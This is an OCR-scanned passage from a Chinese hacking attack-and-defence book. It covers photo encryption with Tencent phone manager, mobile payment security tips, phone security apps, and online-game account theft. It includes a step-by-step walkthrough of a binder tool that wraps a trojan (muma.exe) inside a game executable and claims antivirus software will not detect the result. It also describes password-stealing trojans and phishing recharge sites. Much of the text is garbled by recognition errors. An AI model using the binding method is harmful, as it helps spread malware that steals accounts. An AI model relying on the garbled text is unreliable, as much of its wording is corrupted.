STEP04: 设置 关联 QQ 号 ”STEP05: 进入 程 夺 主 界面 ”STEP06: 添加 照 


BAAOESA LE = 人 JESAEL EE 
手机 管家 隐私 空间 设置 隐私 空间 隐私 照片 


A Ei 





全 当 您 忘记 密码 时 ， 登 录 QQ 号 重 置 密码 _ 添加 之 后 ， 锁 住 照片 里 的 小 秘密 





短信 文件 
@ 保护 个 人 隐私 ， 开始 往 隐 祛 至 问 潜 汞 西 员 添加 
输入 与 之 关联 的 QQ 号 ， 以 便 在 。” 单 击 “ 照 片 ”选项 。 单 击 “ 添 加 ”按钮 。 


隐私 空间 密码 饼 记 时 及 时 找 回 。 
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STEP07: 选择 照片 


图 图 斩 全 局 关中 Et 
隐私 照片 选择 照片 


色 选 需要 添加 的 照片 后 单 击 “ 确 
定 ” 按 钮 。 


STEP10: 再 次 查看 照片 


川 | 恒 辐 8:40 


Oe 
OD 


安全 等 级 4 
处 于 最 佳 防护 状态 





国 ” 软件 权限 扫描 > 
辣 找 \ 防 次 > 





退出 后 再 次 查看 已 加 密 照片 ， 需 
要 进入 隐私 空间 进行 查看 。 


下 面 以 腾讯 手机 管家 为 例 介 绍 苹 果 手机 照片 的 加 密 方法 。 
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攻防 从 入 门 到 精通 


STEP08: 正在 加 密 STEP09: 查看 加 密 照 片 


图 电 杞 人 七 去 轩 Es 图 到 A EN fill ] 8:37 


隐私 空间 隐私 照片 编辑 


若 要 继续 添加 照片 ， 单 击 “ 添 加” 
按钮 即 可 。 
STEP11: 输入 手势 密码 


> BAAEESR SL Es 
手机 管家 ”图 案 密码 


请 绘画 图 案 密码 


输入 手势 密码 后 才 可 查看 已 加 密 
的 照片。 
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手机 黑客 攻防 
STEP01: 打开 腾讯 手机 管家 STEP02: 打开 “相册 管理 ” STEP03: 打开 “加 密 相 册 ” 
加 密 相 册 


腾讯 手机 管家 


iPhone 5s 
内 存 已 用 78% 剩余 空间 9.5G 
硬件 与 保修 > 
流量 监控 


建议 设置 者 旧 ， 于 免 趟 扣 蜂 


人 健康 充电 云端 相册 


入 大计 0 时 3 全 赴 最 高 可 达 10T 空 间 


re 


4 





单 击 “ 相 册 管 理 ” 选 项 。 单 击 “ 加 密 相册 ”选项 。 首次 开启 加 密 相册 需要 设置 密码 。 
STEP04: 再 次 输入 密码 STEP05: 关联 QQ 号 STEP06: 进入 加 密 相 册 


加 密 相 册 





建议 不 要 郝 载 手机 管家 ， 
否则 加 密 相 册 的 数据 会 被 清除 。 
若 要 卸载 ， 请 先 解密 照片 。 


确定 





牢记 设置 的 密码 。 此 处 单 击 “ 确 ”关联 常用 的 QQ 号 , 以 便 忘 记 密 。 单 击 “添加 ”按钮 。 
定 ” 按 钮 。 码 时 重 置 密码 。 
STEP07: 添加 照搬 STEP08: 选取 照片 STEP09: 加 窗 成 功 





加 密 成 功 。 您 可 以 手动 删除 相机 
胶卷 的 原 照片 ， 删 除 后 请 不 要 卸 
载 管家 ， 否 则 无 法 恢复 。 


确定 


从 手机 相册 选取 





单 击 “从 手机 相册 选取 ”选项 。 选 定 要 加 密 的 照片 ， 单 击 “ 确 定 ” 查看 提示 信息 并 单 击 " 确 定 ” 按钮 。 
按钮 。 
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取 客 国 

攻防 从 入 门 到 精通 

新 全 人 人 他 

STEP10: 编辑 照片 STEP11: 删除 照片 


已 选择 1 张 








单 击 “ 编 辑 ” 按 钮 。 选 定 要 删除 的 照片 后 单 击 “ 删 除 ” 
按钮 。 
STEP12: 隐藏 相册 STEP13: 显示 已 隐藏 的 相册 


云端 相册 


最 高 可 达 10T 空 间 


是 





双 指 向 上 滑动 相册 即 可 将 相册 隐 双 指 向 下 滑动 可 以 显示 已 隐藏 的 
藏 起 来 。 相册 。 


6.8 


手机 支付 也 和 为 移动 支付 (Mobile Payment)， 是 指 移 动用 户 使 用 其 移动 终 病 (通常 
手机 ) 对 所 消费 的 商品 或 服务 进行 账 务 文 付 的 一 种 服务 方式 。 继 卡 类 文 付 、 网 络 支付 后 ， 
手机 文 付 伍 然 成 为 人 们 的 “新 宠 ” 


0.8;1 吊 见 的 5 种 于 机 文 付 


1. 支付 宝 
文 付 守 (中 国 ) 网 络 技术 有 限 公 司 是 国内 领先 的 独立 第 三 方 文 付 平 台 ， 由 阿里 巴巴 集 
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团 创办 。 支 付 宝 以 稳健 的 作风 、 先 进 的 技术 、 敏 锐 的 市 场 预 见 能 多云 付 宝 ; 
力 及 社会 责任 感 ， 局 得 了 银行 等 合作 伙伴 的 认同 。 国 内 工商 银行 、 











农业 银行 、 建 设 银行 、 招 商 银 行 、 中 国 银 行 、 交 通 银行 等 各 大 商 阿里 巴巴 :中 国 
业 银 行 以 及 中 国 邮 政 、VISA 国际 组 织 等 各 大 机 构 均 与 文 付 宝 建 5 alibaba.com.cn 


并 了 深入 的 战略 合作 ， 根 据 客户 需求 不 断 推出 创新 产品 ， 成 为 金 
融 机 构 在 电子 支付 领域 最 受信 任 的 合作 伙伴 。 

2. 移动 支付 

移动 文 付 也 称 为 手机 文 付 ， 束 是 允许 用 户 使 用 其 移动 终 
端 〈 通 常 是 手机 ) 对 所 消费 的 商品 或 服务 进行 账 务 文 付 的 一 
种 服务 方式 。 单 位 或 个 人 通过 移动 设备 、 互 联网 或 者 近 上 距离 
传 感 直 接 或 间接 癌 银 行 金 融 机 构 发 送 文 付 指令 产生 货币 文 
付 与 资金 转移 行为 ， 从 而 实现 移动 支付 功能 。 移 动 支付 将 终 
问 设 备 、 互 联网 、 应 用 提供 商 以 及 金融 机 构 相 融合 ， 为 用 户 
提供 货币 支付 、 缴 费 等 金融 业务 。 

3. 安 捷 支 付 

安 捷 文 付 是 由 陕西 西部 数 通电 信 资 讯 有 限 公 司 独立 完成 的 一 个 交易 支付 平台 ， 能 够 提 
供给 用 户 通过 计算 机 (Web)、 电 话 (IVR、WAP、SMS)、 面 对 面 等 多 种 途径 来 进行 交易 
文 付 的 方式 ， 并 需要 通过 移动 电话 进行 实时 信息 互动 确认 来 交易 文 付 ， 通 过 移动 电话 完成 
用 户 账户 资金 变更 的 确认 ， 有 效 保护 注册 用 户 的 银行 资金 安全 。 

安 捷 文 付 与 和 银联、 银行 等 金融 机 构 合 作 ， 构 建 了 领先 、 成 熟 的 “无 磁 文 付 ” 平 台 ， 拥 
有 无 磁 支 付 领域 的 先进 技术 。 合 作 银 行 包括 工商 银行 、 中 国 银行 、 建 设 银行 、 农 业 银 行 等 
在 内 的 几 十 家 银行 ;合作 商户 包括 国内 位 于 前 列 的 第 三 方 文 付 公 司 、 电 信和 运营 商 、 大 型 网 
购 、 电 视 电 话 购物 公司 、 航 空 公 司 、 彩 票 机 构 、 保 险 公 司 、 公 共 缴 费 单 位 等 ， 在 无 磁 文 付 
技术 发 展 、 银 行 通道 、 风 险 探 制 和 市 场 发 展 方面 都 处 于 领先 地 位 。 

































































1、 用 户 通过 商户 WEB 页 面 或 者 电话 下 订单 
产品 、 金 额 、 银 行 卡号 、 身 份 证 号 、 回 拨 。_ 商 户 
的 手机 号 码 等 信息 。) a 






一 一 一 一 一 议 一 一 一 一 一 一 一 一 一 一 § > 
本 人 
“Or Calling 


2、 商 户 将 用 户 的 订单 
信息 传送 至 银联 手机 
支付 平台 。 


| 党 


4、 用 户 根据 自动 语音 
提示 ， 输 入 银行 卡 取款 
密码 。 密 码 正确 即 支 付 
成 功 | 





用 户 及 和 
次 2 | (hI » nh of Bants 
3、 银 联手 机 支付 平台 接 到 用 户 订单 , a 
信息 后 ， 银 联 呼叫 中 心 952132 主动 银联 手机 支付 平台 
回 拨 用 户 手机 。 


4. 接触 支付 
接触 支付 是 指 银行 卡 的 磁 条 或 芯片 与 受理 端 机 具 零 距离 接触 ， 由 机 具 读 出 卡 信息 后 处 
理 支付 业务 ， 以 银行 ATM 和 商店 POS 为 最 常见 。 
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一 > 
全- 攻防 从 入 门 到 精通 
全 人 人 他 
S. 微 信 支付 


微 信 文 付 是 由 腾讯 公司 知名 即时 通信 服务 免费 
聊天 软件 微 信 (Wechat) 及 腾讯 旗下 第 三 方 文 付 平 
台 财 付 通 (Tenpay) 联合 推出 的 互联 网 创新 文 付 产 
品 。 有 了 微 信 文 付 ， 用 户 只 需 在 微 信 中 关联 一 张 银 
行 卡 ， 并 完成 号 份 认证 ， 即 可 将 装 有 微 信 应 用 的 智 
能 手机 变 成 一 个 全 能 钱包 ， 可 购买 合作 商户 的 了 商品 
及 服务 。 用 户 在 文 付 时 上 只 需 在 目 己 的 智能 手机 上 和 输 
入 密码 ， 无 需 刷 卡 即 可 完成 文 付 。 


半 河 [ 


























0.8.2 手机 支付 安全 问题 


与 传统 银行 柜台 办 理 业 务 时 的 “人 证 合 一 ”双重 查验 相 比 ， 手 机 文 付 通过 姓名 、 卡 
号 、 身 份 证 、 手 机 号 就 可 以 完成 ， 一 旦 手机 与 钱包 、 身 份 证 等 资料 一 起 丢失 ， 用 户 的 手 
机 文 付 安全 就 将 面临 巨大 安全 隐患 。 为 了 降低 手机 文 付 风 险 , 用 户 平 时 使 用 时 应 注意 安 
全 防范 。 

1) 不 要 轻信 阳 生 人 发 来 的 二 维 码 信息 ， 如 宋 扫 描 二 维 码 后 打开 的 网 站 要 求 安 闭 新 应 
用 程序 ， 不 要 轻易 安 北 。 

2) 遇 到 交易 对 方 有 明显 古怪 行为 的 ， 应 当 提 高 警惕 ， 不 要 轻信 对 方 的 说 辞 。 

3) 保持 设置 手机 开机 密码 的 习惯 。 在 手机 中 安 北 可 以 加 密 的 软件 ， 对 移动 支付 软件 
增加 一 层 密 码 ， 这 样 ， 即 使 有 人 破解 了 开机 和 密码， 支付 软件 仍 以 有 和 突 码 保护 。 登 录 锯 人 码 和 
文 付 密码 也 要 设置 为 不 同 。 不 要 把 密码 保存 在 手机 里 ， 或 者 设置 成 生日 、 车 牌 等 容易 家 狂 
到 的 个 人 信息 。 

4)“ 电 子 密码 上 融 失效 ”“U 慎 升级 ”等 属于 常用 的 诈骗 术语 ， 如 果 收 到 类 似 短信 ， 双 
无 法 判断 其 真 伪 ， 应 直接 拨打 银行 的 官方 客服 电话 进行 咨询 ， 或 者 到 银行 网 点 柜台 办 理 ， 
绝对 不 能 通过 短信 中 的 网 址 登录 网 银 。 

5) 出 门 不 要 将 银行 卡 、 里 份 证 及 手机 放 在 同一 个 地 方 。 如 来 一 同 丢 失 ， 他 人 可 使 用 
文 付 软件 的 密码 找 回 功能 更 改 密 码 ， 人 危险 程度 极 局 。 

6) 一 旦 手机 突然 没有 信和 号， 在 排除 了 信和 号 问题 和 手机 故障 后 ， 要 奉 询 SIM 卡 是 否 被 
他 人 补办 ， 并 将 文 付 平 台 内 的 余额 园 出 。 

7) 如 果 手 机 丢失 ， 可 在 计算 机 上 登录 支付 宝 等 账号 ， 关 闭 无 线 文 付 业 务 。 如 果 吴 份 
证 、 银 行 卡 连 同 手 机 一 并 丢失 ， 则 加 公安 机 关 和 银行 挂失 。 
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8) 由 于 伪 基 站 诈骗 流行 ， 骗 子 通 过 伪 基 站 技术 可 以 将 发 信号 码 伪装 成 银行 官方 客服 

号 码 。 因 此 ， 即 使 是 银行 官方 客服 号 码 发 来 的 类 似 短信 ， 也 不 要 轻信 。 如 果 收 到 此 类 短信 ， 
要 通过 银行 官方 客服 进行 咨询 。 


6.9 手机 优化 及 安全 性 能 的 提升 








6.9.1 360 于 机 卫士 


360 手机 卫士 是 一 于 完全 免费 的 手机 安全 软件 。 其 功能 主要 有 以 下 几 个 方面 。 

1) 有 效 拦 截 垃圾 短信 和 骚扰 电话 ， 让 手机 恢复 宁静 空间 。 

2) 联网 云 查 杀 恶 意 软 件 ， 实 时 监控 软件 安装 和 联网 ， 彻 底 杜 
绝 恶 意 扣 费 侵害 。 

3) 加 密 重 要 联系 人 的 通讯 记录 ， 防 止 个 人 隐私 泄漏 。 

4) 系统 一 键 清 理 ， 轻 松 为 手机 运行 加 速 。 

5) 归属 地 显示 和 查询 ， 目 动 加 拨 IP 节约 话费 ， 无 痕 短 信 等 。 

360 手机 卫士 的 众多 功能 ， 不 仪 为 用 户 带 来 全 方位 的 手机 安全 
及 隐私 保护 ， 也 让 用 户 使 用 手机 更 加 方便 快捷 。 























LE 
CD 有] 一 加 月 pa 


手机 体检 骚扰 拦截 


隐私 空间 


90 


立即 优化 





忆 6O 手 机 卫士 
我 的 手机 我 做 主 
《多 清理 加 束 (~) 话费 流量 


(CO 骚扰 拦截 人 ) 防 吸 费 


图 支付 保镖 CO) 手机 杀毒 


软件 管家 





0.9.2 ”腾讯 于 机 党 家 


腾讯 手机 管家 是 一 款 完全 免费 的 手机 安全 与 管理 软件 ， 履 盖 了 四 大 知 
能 手机 平台 ， 拥 有 通信 、 系 统 、 隐 私 、 软 件 以 及 上 网 5 大 安全 防护 功能 。 
在 提供 病毒 查 杀 、 骚 扰 拦截 、 软 件 权限 管理 、 手 机 防盗 等 安全 防护 的 基础 
上 ， 主 动 满足 用 户 流量 监控 软件 管理 等 高 端 化 、 智 能 化 的 手机 管理 需求 
更 有 “管家 安全 登录 QQ”“ 秘 拍 ”“ 小 火箭 释放 内 存 ” 等 特色 功能 。 
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器 讯 手机 管家 加 








和 
0 = 二 门 二 二 
赔 ] 放 = a 三 时: 


AE 





腾 





0.9.3 金山 于 机 卫士 


金山 手机 卫士 是 金山 网 络 有 限 公 司 开发 的 一 球 免 费 手 机 安全 软件 ,日 
前 禾 新 symbian 和 android 两 大 主流 移动 平台 ， 以 手机 安全 为 核心 , 提供 流 
量 监 探 、 和 恶意 扣 这 拦 截 、 防 垃圾 短信 、 防 又 扰 电话 、 风 险 软 件 扫描 及 私密 

EN < 

通过 关闭 运行 中 软件 ， 凶 载 已 安装 软件 ， 清 理 坪 圾 文件 ， 消 理 短信 收 
发 件 箱 等 加 快手 机 运行 速度 ; ee 扫描 风险 软件 ， 检 簿 扣 
费 记 录 等 解除 用 户 的 手机 安全 隐患 ， 保 证 手机 及 话费 安全 ; 同时 还 提供 包括 系统 信息 租 看 、 
进程 管理 、 重 局 手机 、 内 存 压 缩 等 党 实 用 功能 ， 














全 是 自 619 目 加 已 哪 4 会 了 | 转 10:35 
金山 手机 卫士 





SN 建议 您 一 键 体检 
| ”了解 手 机 是 否 健 康 


/ 


© 病毒 查 杀 


SS 骚扰 拦截 


全 册 手机 了 十 


Fewwr Bnd ri 








网 游 与 网 吧 攻 防 


网 吧 是 面向 社会 公众 开放 的 营利 性 上 网 服务 场所 ， 用 户 可 利用 网 吧 进 行 网 
页 浏览 、 网 游 、 聊 天 、 听 音乐 或 其 他 活动 ， 一 些 不 法 分 子 在 网 吧 中 植 入 木马 ， 
以 等 待 并 窃取 下 一 位 使 用 该 计算 机 的 用 户 的 账号 和 密码 等 相关 信息 。 


〇 网 游 盗 号 木马 曝光 
〇 解读 网 站 充值 欺骗 术 
O 〇 防范 游戏 账号 破解 

O 〇 警惕 局 域 网 监听 

〇 美 萍 网 管 大 师 





> 





攻防 从 入 门 到 精通 











功能 强大 有 的 网 游资 写 木 号 可 以 盗 取 多 于 网络 游戏 的 账号 和 和 穴 码 信息 ， 这 类 病毒 文件 
运行 后 会 衍生 相关 文件 全 系 开 修 改 注册 表 生 成 局 动 项 ， 通过 注入 进程 可 以 设 
置 消息 监视 ， 鹤 获 用户 的 账 志 资料 并 发 送 到 木马 种 西 者 指定 的 位 置 ， 更 有 一 些 盗 号 木马 
会 把 洲 戏 账 喜 里 的 装备 记录 下 来 一 起 发 送 给 木马 种 植 者 。 


4141 捆绑 盗号 木马 过 程 明光 

在 网 络 游戏 中 , 一 些 游戏 外 挂 、 游 戏 插件 和 游戏 客户 端 软件 多 被 盗号 木马 捆绑 在 一 起 。 
使 用 这 些 程序 的 人 多 数 是 玩 网 络 游 戏 的 人 ， 要 想 盗 取 网 络 游 戏 的 账号 和 密码 信息 ， 最 好 的 
途径 融 是 在 这 些 程序 中 捆绑 盗号 木马 。 图 请 和 Flash 文件 也 经 章 补 捆绑 木马 ， 因 为 图 片 和 
Flash 文件 不 需要 用 户 态 外 执行 ,只 要 打开 就 可 以 运行 , 一 旦 用 户 浏 览 了 被 捆绑 了 木马 的 图 
刻 和 Flash 文件 ， 系 统 束 会 中 毒 。 网 络 上 存在 有 很 多 捆绑 工具 ， 如 水 不 合 杂 的 捆绑 机 。 

下 面 曝光 如 何 使 用 “ 永 不 碍 杀 的 捆绑 机 ”工具 进行 文件 的 捆绑 ， 过 程 如 下 。 
STEP01: 打开 永 不 查 杀 的 捆绑 机 STEP02: 打开 “增加 要 捆绑 的 文件 ” 对话 框 


沉 永 不 查 杀 的 捆绑 机 Yer 1. 1 (友和 角子 工作 室 ) 梧 增加 要 捆绑 的 文件 


查找 范围 
要 捆 乡 的 交 件 区) : | 园 新 建文 件 夹 "| 叶 生 人 续 国 - 
二 一 号 ke ymakelT3. rip radmin3den. zi 
款 Be - r =j scari og. 

) Ei muma. exe canFortl.2. zi 
i B 二 也 V2. llzip eryUSetup. zi 

一 nbdpwn” S “2 setupS. 5. zi 

eofrace. rar 2 
、 汤 eofraceProTri N= Server.r 

I e 沪 sns0 angn. com 

s 口 

7- I1P 
































实 装 首次 运行 : | 下 | 当 首 议 结 束 再 运行 : | 科 one> 下 | 


1. net 

















和 





二 有用 天智 辣 仙 4 各 邮 ! 带 有 上 压缩 打包 功能 ww. huiigeri. net | 
单 击 “ 添 加 文件 ”按钮 。 选择 要 捆绑 的 单 击 “ 打 
文件 开 ” 按 钮 。 
STEP03: 返回 主 窗口 STEP04: 重复 STEP01 和 STEP02 再 添 
加 一 个 应 用 程序 


沉 永 不 查 杀 的 捆绑 机 Yer 1.1 (友和 前 子 工作 室 ) 沉 永 不 查 杀 的 捆绑 机 Yer 1.1  ( 友 前 子 工作 室 ) 
[- 委 朱 洗 肝 基 全 一 和 增加 文件 
EB 寺村 文件 夫 \wne wre se 人 on2009. e 
tr 
re me 
使 用 说 明 
使 用 说 明 


安装 首次 运行 上 | | 当 首 次 结束 再 运行 : | | 安装 首次 运行 : |Strom2009 首次 结束 再 运行 : [EE 



































窗口 运行 状态 上 [默认 ”| 滞 
捆 邯 文件 选择 图 标 
elcome to whw. huilgezl. net mr | 





本 程序 利用 福 软 印 带 的 命令 来 捆 乡 ! 带 有 上 压缩 打包 功能 | ww. haiigezi ne + | www. huiigeri. net 








查看 已 添加 的 应 用 程序 。 选择 “Strom2009.exe” 选择 “muma.exe” 
选项 。 选项 。 
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STEP05: 为 捆绑 文件 选择 图 标 STEP06: 保存 捆绑 文件 


所 永 不 查 杀 的 捆绑 机 。 Yer 1. 1 ( 灰 稿子 工作 室 ) 


要 捆 蔚 的 文件 保存 在 全): |[ 时 桌面 

H: 新建 鼠 件 夹 \m > 加 我 的 立 档 
最 我 的 电脑 

饮 网 上 邻居 





H: \ 新 建立 件 夹 \Str。 om2009. e 

















Ls] 
选中 一 个 单 击 “ 捆 绑 选择 保存 位 置 , 并 “” 国 单 击 “ 保 存 ”按钮 ， 
图 标 。 文件 ”按钮 。 设置 文件 名 。 即 进行 文件 捆绑 。 


earn | [os 当 首 次 结束 和 到 | 待 搓 绑 结 束 后 提示 人 捆 绑 完 成 | ) 单 二 人 确 定 ) 入 
5 钮 ， 即 完成 文件 的 捆绑 操作 。 


和 
肖 涓 访 国 Wm 多 一 写 外 村 


| WHH. huiieeri. net 











“ 永 不 查 杀 捆绑 机 ” 除 支持 常见 的 图 标 图 片 文件 (*JIOC,*.BMP ) 外 ， 还 支 
持 从 可 执行 文件 (*.EXE ) 和 动态 链接 库 (*.DLL ) 中 提取 相关 的 图 标 。 由 于 该 


工具 是 利用 模拟 下 程序 来 支持 多 个 不 同类 型 的 文件 捆绑 成 一 个 可 执行 程序 ,所 
以 一 般 的 杀毒 工具 都 不 会 报警 ， 从 而 避 铬 被 杀毒 软件 查 杀 。 





《12 哪些 网 游 账 号 被 资 的 风险 局 


目前 网 络 洲 戏 已 伍 然 成 为 很 多 人 生活 的 一 部 分 ， 网 络 洲 戏 中 的 很 多 装备 甚至 级别 遍 的 
账号 本 号 也 成 为 玩家 的 财产 ， 在 现实 世界 中 也 可 以 用 来 交易 。 于 是 ， 一 坚 不 法 之 徒 开始 时 
上 了 网 络 游 戏 ， 通 过 资 取 网 络 游戏 的 账号 来 御 取 不 当 之 财 。 

以 下 几 种 网 络 游戏 被 盗 的 风险 最 高 。 

(1) 有 价值 的 账 写 

账号 的 等 级 越 蜗 ， 或 网 络 游 戏 中 的 人 物 北 备 越 好 ， 其 价值 残 越 品 。 如 来 一 个 新 申请 的 
账号 被 盗 ， 那 么 玩家 也 不 会 太 在 意 。 
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(2) 在 网 吧 或 公共 场合 玩 网 络 诉 戏 的 账号 

由 于 这 种 场合 的 计算 机 用 户 不 国定， 这 直接 为 盗号 者 提供 了 方便 。 

(3) 网 游 账号 公用 

很 多 人 玩 网 游 的 人 喜欢 几 个 人 玩 一 个 号 ， 因 为 升级 比较 快 ， 但 是 这 样 束 增加 了 账号 被 
次 的 可 能 性 ， 只 要 这 些 人 中 有 一 个 人 的 机 器 中 了 盗 杞 木马 ， 则 游戏 账号 束 很 有 可 能 被 盗 。 

目前 第 见 的 网 诉 资 号 本 马 有 如 下 儿 种 。 

(1) NRD 系列 网 游 鳃 贼 

NRD 系列 网 游 急 贼 是 一 球 典 型 的 网 游 盗 号 木马 ， 通 过 各 种 木马 下 载 絮 进入 用 户 计 
算 机 ， 利 用 键盘 钓 子 等 技术 资 取 地 下 城 与 勇士 、 麻 甸 世 界 、 传 奇 世界 等 多 款 热 门 网 游 的 
账 志和 密码 ， 还 可 对 受害 用 户 的 计算 机 进行 屏幕 截图 、 熏 取 用 户 存储 在 本 地 计算 机 上 的 
图 厂 文 档 和 文本 文档 ， 以 此 破解 游戏 密 你 卡 ， 并 将 这 些 敏 感 信 息 友 送 到 指定 邮箱 中 。 

(2) 奢 角 密 你 元 性 

该 盗号 木马 是 将 目 己 伪装 为 游戏 ， 是 针对 热门 网 游 “ 克 半 世界 ”游戏 的 木马 。 访 游戏 
会 把 真 wow.exe 改名 后 设置 为 隐藏 文件 ， 木 马 却 以 wow.exe 名 称 出 现在 玩家 面前 。 如 果 玩 
家 不 小 心 运行 了 木马 ， 即 使 账号 绑 定 了 密 人 钼 保护 卡 ， 游 戏 账号 也 会 被 盗 取 。 

(3) 蜜 保 卡 盗 饭 髓 

“ 密 保 卡 盗 鳃 右 ” 是 一 于 针对 网 游 密 保 卡 的 盗号 木马 。 它 会 尝试 搜寻 并 盗 取 用 户 存 放 于 
计算 机 中 的 网 游 密 保 卡 ， 一 旦 成 功 ， 将 最 终 导 任 游 戏 账 号 被 盗 。 

(4) 下 载 狗 变种 

“下 载 狗 变 种 ?是 一 个 木马 下 载 喜 。 利 用 该 工具 可 以 下 载 一 些 网 洲 盗号 木马 和 广告 程序 ， 
从 而 给 用 户 造 成 虚拟 财产 的 损失 以 及 频繁 的 弹 窗 紧 扰 。 


7.2 解读 网 站 充值 欺骗 术 


在 寺 网 络 游戏 的 过 程 中 ， 有 的 玩家 需要 用 金钱 来 购买 更 精 民 的 疙 备 ， 束 需要 在 相应 充 
值 功 能 区 使 用 现实 金钱 换取 游戏 中 的 点 数 。 针 对 这 种 情况 ， 一 些 黑客 就 模拟 游戏 厂商 界面 
或 在 游戏 界面 中 洪 加 一 些 上 共有 诱惑 性 的 广告 信息 ， 以 诱惑 用 户 前 往 充 值 ， 从 而 骗取 钱财 。 


1.2.1 期 驴 原 理 


游戏 网 站 元 值 欺 驴 术 的 原理 和 骗取 网 上 银行 账号 及 密码 信息 的 原理 比较 相似 ， 都 古 使 
用 钓鱼 网 站 、 虚 假 三 告 等 欺骗 手段 。 前 段 时 间 出 现 用 于 欺骗 广大 用 户 的 非法 网 站 
http://www.pay163.com, 它 和 中 实 的 网 易 点 数 卡 充值 查询 中 心 的 网 址 http://pay.163.com 非常 
相似 ， 不 细心 的 玩家 很 容易 上 当 受 骗 。 

还 有 一 些 黑 客 伪 造 网 游 的 官方 网 站 ， 各 个 链接 也 都 能 链接 到 正确 的 网 页 中 ， 但 是 ， 会 
在 主页 的 页 面 中 添加 一 些 虚 假 的 有 奖 信 息 ， 提 示 玩 家 已 经 中 了 大 奖 ， 让 玩家 通过 登录 网 址 
了 解 相关 的 具体 细节 以 及 领取 方式 。 竺 玩家 打开 相应 网 址 后 ， 会 提示 输入 账号 、 密 人 码 、 角 
色 等 级 等 信息 。 一 旦 输入 这 些 资料 ， 玩 家 的 账号 信息 就 被 黑客 盗 取 ， 黑 客 束 可 以 直接 登录 
该 账 喜 ， 并 转移 此 账 亏 中 的 “ 贯 重 物品 ” 


1.22 弟 见 的 欺骗 方式 
网 络 骗术 层出不穷 ， 让 人 防不胜防 ， 尤 其 是 在 网 络 游戏 中 ， 一 不 小 心 就 栽 入 了 盗号 者 
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布下 的 陷阱 。 所 以 ,不 要 轻信 任何 非 官方 网 站 的 表单 提交 程序 ， 一 定 要 通过 正确 的 方式 进 
入 网 游 公司 的 正式 页 面 才能 确保 账号 安全 。 款 客 第 用 的 欺骗 方式 有 如 下 儿 种 。 

1. 冒充 省 理 员 或 工作 人 员 骗 取 账 号 密码 

这 种 方法 比较 常见 ， 盗 号 者 一 般 是 申请 “游戏 官 理 员 ”“ 网 易 友 奖 员 ”“ 点 卡 验证 员 ” 
等 名 字 ， 然 后 发 送 一 些 虚假 的 中 奖 信 息 。 

一 般 在 游戏 中 只 有 一 个 “游戏 管理 员 ”， 人 其 他 任何 管理 员 都 是 假 骨 上 的， 而且“ 游戏 管理 
员 ” 在 游戏 中 一 般 是 不 会 回 用 户 索 取 账 号 和 密码 的 “游戏 管理 员 ” 如 果 要 索取 用 户 的 账号 、 
密码 查询 ， 也 只 会 让 用 户 通 过 客服 专区 或 邮件 的 形式 提交 。 

游戏 官方 只 会 在 主页 上 以 公告 的 形式 同 用 户 公 布 与 中 奖 有 关 的 任何 信息 ， 而 不 会 在 游 
戏 中 。 如 果 在 游戏 的 过 程 中 发 现 有 人 发 送 类 似 驴 取 账号 和 密码 的 信息 ， 可 以 蕊 上 辣 在 线 的 
“游戏 官 理 员 ”报告 ， 或 者 通过 客服 专区 提交 。 

2. 利用 账号 买卖 等 形式 骗取 账号 和 密码 

这 种 方法 是 利用 虚假 的 交易 账号 来 骗取 玩家 的 账号 。 盗 号 者 通常 以 忌 写 为 名 ， 把 号 足 
给 用 户 ， 但 是 在 得 到 钱 后 过 儿 天 束 通 过 安全 公 把 账号 找 回去 ;或 假装 想 购买 用 户 的 账号 ， 
以 先 看 号 为 名 骗取 账 亏 。 其 防范 方法 如 下 。 

1) 拒绝 虚拟 财产 交易 ， 尤 其 是 账号 交易 。 

2) 不 要 将 日 己 的 账号 、 安 全 个 或 密码 轻易 告诉 他 人 。 

3. 发 送 虚 假 信 息 欺 骗 用 成 

盗号 者 通 钊 会 通过 游戏 频道 问 他 人 上 发送 类 似 “ 告 诉 大 家 一 个 好 消息 ， 网 易 账 扎 系 统 已 
经 被 破解 了 ， 可 以 通过 登录 http://xy2on**.****.com 页 面 修改 安全 人 码 !” 的 通知 。 用 户 一 旦 
登录 该 页 面 并 输入 目 己 的 账号 密码 等 信息 ， 该 用 户 的 这 些 信 息 束 会 被 盗 配 者 饭 取 。 

该 种 其 驴 方 式 的 防 泡 方 法 如 下 。 

1) 不 要 轻信 类 似 的 信息 。 

2) 如 果 要 修改 安全 码 ， 则 一 定 要 到 游戏 开发 公司 的 官方 网 站 上 修改 。 

4. 冒充 朋友 ， 在 游戏 中 索要 用 户 账 号 、 点 卡 等 信息 

该 种 盗号 方式 的 特点 是 : 盗 可 者 日 称 是 游戏 中 用 户 的 朋友 或 菜 朋友 的 小 写 ， 然 后 称 想 
要 看 用 户 的 极品 装备 ， 或 帮 用 户 练 级 、 充 值 点 卡 等 ， 从 而 问 其 索要 账号 、 密 人 码 ; 而 当 用 户 
将 账 扎 、 密 码 发 给 对 方 后 ， 其 账号 瓯 会 立刻 下 线 ， 当 再 次 尝试 登录 时 将 会 提示 客人 码 错误 。 
其 防范 方法 是 不 要 轻易 将 上 自己 的 游戏 账 志 和 密 但 随意 告诉 他 人 。 





































































































1.2.3 ”提高 防 泥 意 识 


网 络 游戏 玩家 提高 安全 防 泡 意识 是 保证 账号 和 密码 不 被 盗 取 的 关键 因素 ， 除 上 述 防 苑 
音 施 外 ， 族 戏 玩家 还 要 注意 防范 本 机 中 的 网 络 安 全 ， 防 范 木 马 病 毒 的 攻击 ， 主 要 表现 在 如 
le 

1) 在 下 浏览 器 页 面 中 选择 “工具 ”>“Internet 选项 ”菜单 命令 ， 即 可 打开 “Internet 
选项 ”对 话 框 ， 如 下 左 图 所 示 。 在 “安全 ”选项 卡 中 单 击 “ 目 定 义 级 别 ” 按 钮 ， 在 “安全 
设置 -Internet 区 域 ” 对 话 框 中 的 “ 重 置 为 ”下 拉 列 表 框 中 选择 “高 ”选项 ， 如 下 右 图 所 示 。 
单 击 “ 确 定 ” 按 钮 ， 即 可 将 Internet 的 级 别 设置 为 高 。 将 下 浏览 右 的 “Internet 选项 ”的 “高 
级 ”设置 为 默认 设置 。 
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取 ED Fn > 
新 全- 攻防 从 入 门 到 精通 


全 人 人 他 
rnet 选项 


| 常规 | 安全 ”| 隐私 [内 容 [连接 | 程序 [高 级 | 
选择 一 个 区 域 以 查看 或 更 改 安全 设 


@ < 


Internet -本 地 ， 受信 任 有 9 到 限制 有 





安全 设置 - Internet 区 域 











.HET Framework 
于 证 ad 浏览 器 应 用 程序 








Internet 
@ Hn 


该 区 域 的 安全 级 别 0L) 
和 中 到 高 


二 检 XIL 
@ 在 用 


了 启用 





了 提示 
是 .] ET Franework 相关 组 件 


4 Co TT 


+ 在 重新 启动 你 的 计算 机 后 生效 


























